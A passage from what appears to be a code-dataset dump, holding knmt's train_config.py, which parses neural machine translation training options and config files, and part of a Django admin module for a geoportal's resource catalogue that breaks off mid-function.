73, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 136, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 142, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 146, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 148, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 152, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 154, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 167, "usage_type": "attribute"}, {"api_name": "benchmarking.stop", "line_number": 169, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 175, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 184, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 192, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 202, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 208, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 210, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 101, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 233, "usage_type": "call"}, {"api_name": "psana.EventId", "line_number": 238, "usage_type": "attribute"}, {"api_name": "psana.EventId", "line_number": 239, "usage_type": "attribute"}, {"api_name": "benchmarking.Event.as_timestamp", "line_number": 243, "usage_type": "call"}, {"api_name": "benchmarking.Event", "line_number": 243, "usage_type": "name"}, {"api_name": "benchmarking.stop", "line_number": 244, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 221, "usage_type": "name"}, {"api_name": "benchmarking.start", "line_number": 272, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 274, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 285, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 290, "usage_type": "call"}, {"api_name": "benchmarking.log", "line_number": 267, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 315, "usage_type": "call"}, {"api_name": "benchmarking.set_defaults", "line_number": 329, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 337, "usage_type": "call"}, {"api_name": "mpi4py.MPI.COMM_WORLD", "line_number": 339, "usage_type": "attribute"}, {"api_name": "mpi4py.MPI", "line_number": 339, "usage_type": "name"}, {"api_name": "benchmarking.stop", "line_number": 340, "usage_type": "call"}, {"api_name": "benchmarking.start", "line_number": 352, "usage_type": "call"}, {"api_name": "psana.DataSource", "line_number": 353, "usage_type": "call"}, {"api_name": "benchmarking.stop", "line_number": 354, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "benchmarking.event_log", "line_number": 368, "usage_type": "call"}]} +{"seq_id": "40041528526", "text": "\"\"\"train_config.py: Parse training arguments and create config dictionnary.\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport sys\nimport six\n\nfrom nmt_chainer.utilities import 
argument_parsing_tools\n\nlogging.basicConfig()\nlog = logging.getLogger(\"rnns:train_config\")\nlog.setLevel(logging.INFO)\n\n_CONFIG_SECTION_TO_DESCRIPTION = {\"model\": \"Model Description\",\n \"training\": \"Training Parameters\",\n \"training_management\": \"Training Management and Monitoring\"}\n\n\ndef define_parser(parser):\n parser.add_argument(\"data_prefix\", nargs=\"?\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"prefix of the training data created by make_data.py\")\n parser.add_argument(\"save_prefix\", nargs=\"?\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"prefix to be added to all files created during the training\")\n\n model_description_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"model\"])\n model_description_group.add_argument(\"--Ei\", type=int, default=640, help=\"Source words embedding size.\")\n model_description_group.add_argument(\"--Eo\", type=int, default=640, help=\"Target words embedding size.\")\n model_description_group.add_argument(\"--Hi\", type=int, default=1024, help=\"Source encoding layer size.\")\n model_description_group.add_argument(\"--Ho\", type=int, default=1024, help=\"Target hidden layer size.\")\n model_description_group.add_argument(\"--Ha\", type=int, default=1024, help=\"Attention Module Hidden layer size.\")\n model_description_group.add_argument(\"--Hl\", type=int, default=512, help=\"Maxout output size.\")\n model_description_group.add_argument(\"--encoder_cell_type\", default=\"lstm\", help=\"cell type of encoder. format: type,param1:val1,param2:val2,...\") # where type is in [%s]\"%(\" \".join(rnn_cells.cell_dict.keys())))\n model_description_group.add_argument(\"--decoder_cell_type\", default=\"lstm\", help=\"cell type of decoder. format same as for encoder\")\n model_description_group.add_argument(\"--lexical_probability_dictionary\", help=\"lexical translation probabilities in zipped JSON format. 
Used to implement https://arxiv.org/abs/1606.02006\")\n model_description_group.add_argument(\"--lexicon_prob_epsilon\", default=1e-3, type=float, help=\"epsilon value for combining the lexical probabilities\")\n model_description_group.add_argument(\"--use_deep_attn\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_accumulated_attn\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--init_orth\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_bn_length\", default=0, type=int)\n model_description_group.add_argument(\"--use_goto_attention\", default=False, action=\"store_true\")\n \n model_description_group.add_argument(\"--use_ff_model\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--ff_d_model\", type=int, default=512, help=\"FF model d_model\")\n model_description_group.add_argument(\"--ff_n_heads\", type=int, default=8, help=\"FF model number of attention heads\")\n model_description_group.add_argument(\"--ff_nb_layers_src\", type=int, default=6, help=\"FF model number of source layers\")\n model_description_group.add_argument(\"--ff_nb_layers_tgt\", type=int, default=6, help=\"FF model number of target layers\")\n model_description_group.add_argument(\"--ff_dropout\", type=float, help=\"FF model dropout\")\n model_description_group.add_argument(\"--ff_d_ff\", type=int, default=2048, help=\"FF model d_ff\")\n model_description_group.add_argument(\"--ff_use_exp_relu\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--ff_residual_mode\", default=\"normal\", choices=\"normal none after\".split())\n model_description_group.add_argument(\"--ff_no_normalize\", default=False, action=\"store_true\")\n model_description_group.add_argument(\"--use_own_layer_normalization\", default=False, action=\"store_true\")\n \n training_paramenters_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"training\"])\n training_paramenters_group.add_argument(\"--mb_size\", type=int, default=64, help=\"Minibatch size\")\n training_paramenters_group.add_argument(\"--nb_batch_to_sort\", type=int, default=20, help=\"Sort this many batches by size.\")\n training_paramenters_group.add_argument(\"--noise_on_prev_word\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--l2_gradient_clipping\", type=float, default=1, help=\"L2 gradient clipping. 0 for None\")\n training_paramenters_group.add_argument(\"--hard_gradient_clipping\", type=float, nargs=2, help=\"hard gradient clipping.\")\n training_paramenters_group.add_argument(\"--weight_decay\", type=float, help=\"Weight decay value. 
\")\n training_paramenters_group.add_argument(\"--optimizer\", choices=[\"sgd\", \"rmsprop\", \"rmspropgraves\",\n \"momentum\", \"nesterov\", \"adam\", \"scheduled_adam\", \"adagrad\", \"adadelta\"],\n default=\"adam\", help=\"Optimizer type.\")\n training_paramenters_group.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"Learning Rate\")\n training_paramenters_group.add_argument(\"--momentum\", type=float, default=0.9, help=\"Momentum term\")\n training_paramenters_group.add_argument(\"--randomized_data\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--no_shuffle_of_training_data\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--use_reinf\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--use_previous_prediction\", default=0, type=float)\n training_paramenters_group.add_argument(\"--curiculum_training\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--reverse_src\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--reverse_tgt\", default=False, action=\"store_true\")\n \n training_paramenters_group.add_argument(\"--use_soft_prediction_feedback\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--use_gumbel_for_soft_predictions\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--temperature_for_soft_predictions\", type=float, default=1.0)\n\n\n training_paramenters_group.add_argument(\"--dynamic_batching\", default=False, action=\"store_true\")\n training_paramenters_group.add_argument(\"--dynamic_batching_max_elems\", type=int, default=10000)\n training_paramenters_group.add_argument(\"--dynamic_batching_nb_sent_to_sort\", type=int, default=5000)\n \n training_paramenters_group.add_argument(\"--load_initial_source_embeddings\")\n training_paramenters_group.add_argument(\"--load_initial_target_embeddings\")\n\n training_monitoring_group = parser.add_argument_group(_CONFIG_SECTION_TO_DESCRIPTION[\"training_management\"])\n training_monitoring_group.add_argument(\"--config\", help=\"load a training config file\")\n training_monitoring_group.add_argument(\"--data_prefix\", dest=\"data_prefix\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"same as positional argument --data_prefix\")\n training_monitoring_group.add_argument(\"--save_prefix\", dest=\"save_prefix\",\n action=argument_parsing_tools.ArgumentActionNotOverwriteWithNone,\n help=\"same as positional argument --save_prefix\")\n training_monitoring_group.add_argument(\"--gpu\", type=int, help=\"specify gpu number to use, if any\")\n training_monitoring_group.add_argument(\"--load_model\", help=\"load the parameters of a previously trained model\")\n training_monitoring_group.add_argument(\"--load_optimizer_state\", help=\"load previously saved optimizer states\")\n training_monitoring_group.add_argument(\"--load_trainer_snapshot\", help=\"load previously saved trainer states\")\n training_monitoring_group.add_argument(\"--use_memory_optimization\", default=False, action=\"store_true\",\n help=\"Experimental option that could strongly reduce memory used.\")\n training_monitoring_group.add_argument(\"--max_nb_iters\", type=int, default=None, help=\"maximum number of iterations\")\n training_monitoring_group.add_argument(\"--max_nb_epochs\", type=int, default=None, help=\"maximum number of epochs\")\n 
training_monitoring_group.add_argument(\"--max_src_tgt_length\", type=int, help=\"Limit length of training sentences\")\n training_monitoring_group.add_argument(\"--report_every\", type=int, default=200, help=\"report every x iterations\")\n training_monitoring_group.add_argument(\"--no_resume\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--no_report_or_save\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--sample_every\", default=200, type=int)\n training_monitoring_group.add_argument(\"--save_ckpt_every\", default=4000, type=int)\n training_monitoring_group.add_argument(\"--save_initial_model_to\", help=\"save the initial model parameters to given file in npz format\")\n training_monitoring_group.add_argument(\"--reshuffle_every_epoch\", default=False, action=\"store_true\", help=\"reshuffle training data at the end of each epoch\")\n training_monitoring_group.add_argument(\"--resume\", default=False, action=\"store_true\", help=\"resume training from checkpoint config\")\n training_monitoring_group.add_argument(\"--timer_hook\", default=False, action=\"store_true\", help=\"activate timer hook for profiling\")\n training_monitoring_group.add_argument(\"--force_overwrite\", default=False, action=\"store_true\", help=\"Do not ask before overwiting existing files\")\n training_monitoring_group.add_argument(\"--description\", help=\"Optional message to be stored in the configuration file\")\n\n training_monitoring_group.add_argument(\"--set_false_in_config\", nargs=\"*\", help=\"Forcing some options to be false\")\n \n training_monitoring_group.add_argument(\"--update_old_config_file_with_default_values\", \n default=False, action=\"store_true\", help=\"When using older config files\")\n\n training_monitoring_group.add_argument(\"--generate_computation_graph\", help=\"will generate computation graph of the first loss computed\")\n\n training_monitoring_group.add_argument(\"--disable_cudnn_softmax\", default=False, action=\"store_true\")\n training_monitoring_group.add_argument(\"--use_chainerx\", default=False, action=\"store_true\", help=\"use chainerx\")\n\nclass CommandLineValuesException(Exception):\n pass\n\n#\n# def load_training_config_file(filename):\n# file_content = json.load(open(filename))\n\n\ndef get_parse_option_orderer():\n description_to_config_section = dict((v, k) for (k, v) in six.iteritems(_CONFIG_SECTION_TO_DESCRIPTION))\n por = argument_parsing_tools.ParseOptionRecorder(group_title_to_section=description_to_config_section,\n ignore_positional_arguments=set([\"save_prefix\", \"data_prefix\"]))\n define_parser(por)\n return por\n\n\ndef convert_cell_string(config_training, no_error=False):\n import nmt_chainer.models.rnn_cells_config\n\n try:\n if \"encoder_cell_type\" in config_training[\"model\"] and config_training[\"model\"][\"encoder_cell_type\"] is not None:\n config_training[\"model\"][\"encoder_cell_type\"] = nmt_chainer.models.rnn_cells_config.create_cell_config_from_string(\n config_training[\"model\"][\"encoder_cell_type\"])\n\n if \"decoder_cell_type\" in config_training[\"model\"] and config_training[\"model\"][\"decoder_cell_type\"] is not None:\n config_training[\"model\"][\"decoder_cell_type\"] = nmt_chainer.models.rnn_cells_config.create_cell_config_from_string(\n config_training[\"model\"][\"decoder_cell_type\"])\n except BaseException:\n if not no_error:\n raise\n\n\ndef load_config_train(filename, readonly=True, no_error=False):\n config = 
argument_parsing_tools.OrderedNamespace.load_from(filename)\n    if \"metadata\" not in config: # older config file\n        parse_option_orderer = get_parse_option_orderer()\n        config_training = parse_option_orderer.convert_args_to_ordered_dict(config[\"command_line\"], args_is_namespace=False)\n\n        convert_cell_string(config_training, no_error=no_error)\n\n        assert \"data\" not in config_training\n        config_training[\"data\"] = argument_parsing_tools.OrderedNamespace()\n        config_training[\"data\"][\"data_fn\"] = config[\"data\"]\n        config_training[\"data\"][\"Vi\"] = config[\"Vi\"]\n        config_training[\"data\"][\"Vo\"] = config[\"Vo\"]\n        config_training[\"data\"][\"voc\"] = config[\"voc\"]\n\n        assert \"metadata\" not in config_training\n        config_training[\"metadata\"] = argument_parsing_tools.OrderedNamespace()\n        config_training[\"metadata\"][\"config_version_num\"] = 0.9\n        config_training[\"metadata\"][\"command_line\"] = None\n        config_training[\"metadata\"][\"knmt_version\"] = None\n        config = config_training\n    elif config[\"metadata\"][\"config_version_num\"] != 1.0:\n        raise ValueError(\"The config version of %s is not supported by this version of the program\" % filename)\n\n    # Compatibility with intermediate versions of config file\n    if \"data_prefix\" in config and \"data_prefix\" not in config[\"training_management\"]:\n        config[\"training_management\"][\"data_prefix\"] = config[\"data_prefix\"]\n        del config[\"data_prefix\"]\n\n    if \"train_prefix\" in config and \"train_prefix\" not in config[\"training_management\"]:\n        config[\"training_management\"][\"train_prefix\"] = config[\"train_prefix\"]\n        del config[\"train_prefix\"]\n\n    if readonly:\n        config.set_readonly()\n    return config\n\n\ndef find_which_command_line_arguments_were_given(argument_list):\n    pwndan = argument_parsing_tools.ParserWithNoneDefaultAndNoGroup()\n    define_parser(pwndan)\n    args_given_set = pwndan.get_args_given(argument_list)\n    return args_given_set\n\n\ndef make_config_from_args(args, readonly=True):\n    config_base = None\n    if args.config is not None:\n        log.info(\"loading training config file %s\", args.config)\n        config_base = load_config_train(args.config, readonly=False)\n\n    if args.set_false_in_config is not None:\n        for option_name in args.set_false_in_config:\n            path_option = option_name.split(\".\")\n            last_dict = config_base\n            for level in six.moves.range(len(path_option) - 1):\n                # descend one level per path component of the dotted option name\n                last_dict = last_dict[path_option[level]]\n            last_dict[path_option[-1]] = False\n            \n\n    parse_option_orderer = get_parse_option_orderer()\n    config_training = parse_option_orderer.convert_args_to_ordered_dict(args)\n\n    convert_cell_string(config_training)\n\n    if config_base is not None:\n        args_given_set = find_which_command_line_arguments_were_given(\n            args.__original_argument_list)\n        for argname in set(args_given_set):\n            if getattr(args, argname) is None:\n                args_given_set.remove(argname)\n\n        print(\"args_given_set\", args_given_set)\n        config_base.update_recursive(config_training, valid_keys=args_given_set, add_absent_keys=args.update_old_config_file_with_default_values)\n        config_training = config_base\n    else:\n        assert \"data\" not in config_training\n        assert \"metadata\" not in config_training\n\n# config_data_fn = config_training[\"data_prefix\"] + \".data.config\"\n\n    if config_training[\"training_management\"][\"data_prefix\"] is None or config_training[\"training_management\"][\"save_prefix\"] is None:\n        raise CommandLineValuesException(\"save_prefix and data_prefix need to be set either on the command line or in a config file\")\n\n    
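# Stamp the merged config with version and command-line metadata; load_config_train\n    # above relies on config_version_num to reject incompatible files when reloading.\n    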
config_training.add_metadata_infos(version_num=1, overwrite=args.config is not None)\n\n if readonly:\n config_training.set_readonly()\n\n return config_training\n\n\n# def load_config_train(filename, readonly = True):\n# config_as_ordered_dict = json.load(open(filename), object_pairs_hook=OrderedDict)\n#\n# config = OrderedNamespace.load_from(filename)\n# if \"metadata\" not in config_as_ordered_dict: # older config file\n# parse_option_orderer = get_parse_option_orderer()\n# config_training = parse_option_orderer.convert_args_to_ordered_dict(config_as_ordered_dict[\"command_line\"], args_is_namespace = False)\n#\n# assert \"data\" not in config_training\n# config_training[\"data\"] = argument_parsing_tools.OrderedNamespace()\n# config_training[\"data\"][\"data_fn\"] = config_as_ordered_dict[\"data\"]\n# config_training[\"data\"][\"Vi\"] = config_as_ordered_dict[\"Vi\"]\n# config_training[\"data\"][\"Vo\"] = config_as_ordered_dict[\"Vo\"]\n# config_training[\"data\"][\"voc\"] = config_as_ordered_dict[\"voc\"]\n#\n# assert \"metadata\" not in config_training\n# config_training[\"metadata\"] = argument_parsing_tools.OrderedNamespace()\n# config_training[\"metadata\"][\"config_version_num\"] = 0.9\n# config_training[\"metadata\"][\"command_line\"] = None\n# config_training[\"metadata\"][\"knmt_version\"] = None\n# elif config_as_ordered_dict[\"metadata\"][\"config_version_num\"] == 1.0:\n# argument_parsing_tools.OrderedNamespace.convert_to_ordered_namespace(config_as_ordered_dict)\n# config_training = config_as_ordered_dict\n# else:\n# raise ValueError(\"The config version of %s is not supported by this version of the program\" % filename)\n#\n# if readonly:\n# config_training.set_readonly()\n# return config_training\n\ndef command_line(arguments=None):\n import argparse\n parser = argparse.ArgumentParser(description=\"Train a RNNSearch model\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n define_parser(parser)\n args = parser.parse_args(args=arguments)\n\n do_train(args)\n\n\ndef do_train(args):\n import nmt_chainer.training_module.train\n config = make_config_from_args(args, readonly=False)\n nmt_chainer.training_module.train.do_train(config)\n\n\nif __name__ == '__main__':\n command_line()\n", "repo_name": "fabiencro/knmt", "sub_path": "nmt_chainer/training_module/train_config.py", "file_name": "train_config.py", "file_ext": "py", "file_size_in_byte": 18496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 21, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 21, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 24, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 24, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 91, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 91, "usage_type": "name"}, {"api_name": 
"nmt_chainer.utilities.argument_parsing_tools.ArgumentActionNotOverwriteWithNone", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 94, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 136, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ParseOptionRecorder", "line_number": 137, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 137, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.models.rnn_cells_config.create_cell_config_from_string", "line_number": 148, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.models", "line_number": 148, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 148, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.models.rnn_cells_config.create_cell_config_from_string", "line_number": 152, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.models", "line_number": 152, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 152, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace.load_from", "line_number": 160, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 160, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 160, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 168, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 168, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.OrderedNamespace", "line_number": 175, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 175, "usage_type": "name"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools.ParserWithNoneDefaultAndNoGroup", "line_number": 198, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.argument_parsing_tools", "line_number": 198, "usage_type": "name"}, {"api_name": "six.moves.range", "line_number": 214, "usage_type": "call"}, {"api_name": "six.moves", "line_number": 214, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 283, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 284, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities.training_module.train.do_train", "line_number": 295, "usage_type": "call"}, {"api_name": "nmt_chainer.utilities.training_module", "line_number": 295, "usage_type": "attribute"}, {"api_name": "nmt_chainer.utilities", "line_number": 295, "usage_type": "name"}]} +{"seq_id": "39872997272", "text": "from django.contrib import admin\nfrom django.contrib.gis.admin import OSMGeoAdmin\n\n\nfrom django.views.decorators.cache import never_cache\nfrom django.contrib.admin import SimpleListFilter\nfrom .models import Resource,End_Point,Publisher,Tag,URL,Status_Log,Owner,Type,Geometry_Type,Format,Place,Named_Place, Category,Category_Keywords,Change_Log,Community_Input, Georeference_Request,URL_Type,URL\n\nfrom django.utils.safestring import mark_safe\n\nimport json\nfrom pygments import highlight\nfrom pygments.lexers import JsonLexer\nfrom pygments.formatters import HtmlFormatter\nfrom django.db import connection\n\nfrom django.contrib import messages\nfrom 
django.utils.translation import ngettext\n\nfrom django.http import HttpResponseRedirect\nimport resources.ingester.Delete_From_Solr as Delete_From_Solr\nimport resources.ingester.DB_ToGBL as db_to_gbl\nimport resources.ingester.Publish_ToGBL as publish_to_gbl\nfrom django.shortcuts import render\n\nimport decimal\nfrom django.contrib.gis.geos import Point, WKTWriter\nfrom django.contrib.gis.geos import GEOSGeometry\n\nimport os\nimport glob\nimport sys\nsys.setrecursionlimit(10000)\n\n# # Register the models\n# class MyModelAdmin(admin.ModelAdmin):\n# list_display = ('id', 'description')\n\nclass MyAdminSite(admin.AdminSite):\n # @never_cache\n site_header = 'Geoportal Administration'\n\nadmin_site = MyAdminSite(name='myadmin')\n\n\n# allow folder editing within the node interface\nclass URLInline(admin.StackedInline):\n model = URL\n list_display = ('url', 'url_type', 'url_label', 'get_link', )\n\n\n fieldsets = [\n (None, {'fields': [('url','get_link')]}),\n (None, {'fields': [('url_type','url_label')]}),\n (None, {'fields': [('geo_reference')]}),\n ]\n readonly_fields = [\"get_link\",\"geo_reference\"]\n\n extra = 0\n\n def get_link(self, obj):\n if obj.pk:\n html = \"Go\"\n return mark_safe(html)\n else:\n return '-'\n\n get_link.short_description = (\"Link\")\n get_link.allow_tags = True\n\n def geo_reference(self, obj):\n if obj.pk and str(obj.url_type)=='image':\n corners=\"\"\n if obj.resource.bounding_box:\n points = []\n for b in obj.resource.bounding_box:\n for p in b:\n points.append(str(p[0]) + \" \" + str(p[1]))\n corners = \"&d=\"+','.join(points)\n solr_id=str(obj.resource.resource_id)+\"-\"+str(obj.resource.end_point.id)\n html = \"Open Georeferencer\"\n return mark_safe(html)\n else:\n return '-'\n\n geo_reference.short_description = (\"Geo Reference\")\n geo_reference.allow_tags = True\n\n\nclass Status_LogInline(admin.StackedInline):\n model = Status_Log\n extra = 0\n\nclass Change_LogInline(admin.StackedInline):\n model = Change_Log\n classes = ['collapse']\n # readonly_fields = ('field_name', \"date_\", \"change_type\")\n fieldsets = [\n (None, {'fields': [('field_name', \"date\", \"change_type\")]}),\n (None, {'fields': ['new']}),\n (None, {'fields': ['old']}),\n (None, {'fields': ['community_input']})\n\n ]\n extra = 0\n\nclass ParentInline(admin.StackedInline):\n model = Resource.parent.through\n fk_name = \"from_resource\" # not work \"parent_resource\" \"resource_id\", \"parent_id\", from_resource_id, to_resource_id\n classes = ['collapse']\n verbose_name = \"Parent Resource\"\n verbose_name_plural = \"Parent Resources\"\n extra = 0\n show_change_link=True\n\nclass ChildrenInline(admin.StackedInline):\n model = Resource.parent.through\n fk_name = \"to_resource\" # not work \"parent_resource\" \"resource_id\", \"parent_id\", from_resource_id, to_resource_id\n classes = ['collapse']\n verbose_name = \"Child Resource\"\n verbose_name_plural = \"Child Resources\"\n extra = 0\n show_change_link=True\n\nclass ParentFilter(admin.SimpleListFilter):\n title = 'Root Resource'\n parameter_name = 'is_parent'\n\n def lookups(self, request, model_admin):\n return (\n ('Yes', 'Yes'),\n ('No', 'No'),\n )\n\n def queryset(self, request, queryset):\n value = self.value()\n if value == 'Yes':\n return queryset.filter(parent=None)\n elif value == 'No':\n return queryset.exclude(parent=None)\n return queryset\n\n# @admin.register(Resource)\nclass ResourceAdmin(OSMGeoAdmin):\n list_filter = ('end_point',\"type\",\"status_type\",\"owner\",ParentFilter,\"missing\")\n search_fields = 
('title','alt_title','description','resource_id',)\n list_display = ('title', 'year','end_point','get_thumb_small','type','get_category','status_type',\"child_count\",\"accessioned\")\n\n readonly_fields = ('get_thumb',\"_layer_json\",\"_raw_json\",\"get_tags\",\"get_named_places\",\"get_category\",\"child_count\",\"preview\")\n\n autocomplete_fields =(\"tag\",\"named_place\",\"owner\", \"publisher\")\n fieldsets = [\n (None, {'fields': [('resource_id','preview'),'year','temporal_coverage']}),\n (None, {'fields': [('title', 'alt_title')]}),\n (None, {'fields': ['status_type','end_point',\"missing\"]}),\n (None, {'fields': [('resource_type')]}),\n (None, {'fields': [('type', 'geometry_type', \"format\")]}),\n\n (None, {'fields': [\"get_thumb\", \"thumbnail\"]}),\n (None, {'fields': [(\"owner\", \"publisher\")]}),\n (None, {'fields': [(\"created\",\"modified\",\"accessioned\")]}),\n\n (None, {'fields': ['description']}),\n (None, {'fields': ['bounding_box']}),\n\n (None, {'fields': [\"languages\",\"category\"]}),\n (None, {'fields': [( \"get_tags\",\"tag\")]}),\n (None, {'fields': [(\"get_named_places\",\"named_place\")]}),\n\n\n (None, {'fields': [\"_raw_json\"]}),\n (None, {'fields': [\"_layer_json\"]}),\n (None, {'fields': [\"license_info\"]}),\n\n ]\n\n def child_count(self, obj=None):\n with connection.cursor() as cursor:\n cursor.execute(\"Select count(id) from resources_resource_parent where to_resource_id={};\".format(obj.id))\n\n return (cursor.fetchone()[0])\n\n\n\n def get_tags(self, obj=None):\n print(obj.tag.all())\n return \", \".join([t.name for t in obj.tag.all()])\n\n def get_named_places(self, obj=None):\n return \", \".join([p.name for p in obj.named_place.all()])\n\n def get_category(self, obj):\n return \",\".join([p.name for p in obj.category.all()])\n\n def get_thumb(self, obj=None):\n html = ''.format(obj.thumbnail) if obj.thumbnail else \"\"\n return mark_safe(html)\n\n def get_thumb_small(self, obj=None):\n\n html = ''.format(obj.thumbnail) if obj.thumbnail else \"\"\n return mark_safe(html)\n\n def _raw_json(self, obj=None):\n return mark_safe(get_pretty_json(obj.raw_json)) if obj.raw_json else \"\"\n\n def _layer_json(self, obj=None):\n return mark_safe(get_pretty_json(obj.layer_json)) if obj.layer_json else \"\"\n\n inlines = [\n ParentInline,\n ChildrenInline,\n URLInline,\n Status_LogInline,\n Change_LogInline\n ]\n\n def get_actions(self, request):\n actions = super().get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n actions = [\"add_selected_resources_to_staging\",\"delete_selected_resources\", 'remove_selected_resources_from_index_staging']\n\n def add_selected_resources_to_staging(self, request, queryset):\n # first export\n\n directory = os.path.dirname(os.path.realpath(__file__)) + \"/ingester\"\n verbosity=1\n # clear the directory\n if os.path.exists(directory + \"/json\"):\n files = glob.glob(directory + \"/json/*\")\n if (verbosity>1):\n print(\"removing existing files from past ingest for a fresh start!\")\n\n for f in files:\n os.remove(f)\n\n #if a child is selected we should ingest the parent instead\n for r in queryset:\n # todo - need a better way than just relying upon the parent status\n r.layers = Resource.objects.filter(status_type=r.status_type, parent=r.id)\n print(\"The layers are:\", r.layers)\n # return\n # associate the children\n for r in queryset:\n #todo - need a better way than just relying upon the parent status\n r.layers = 
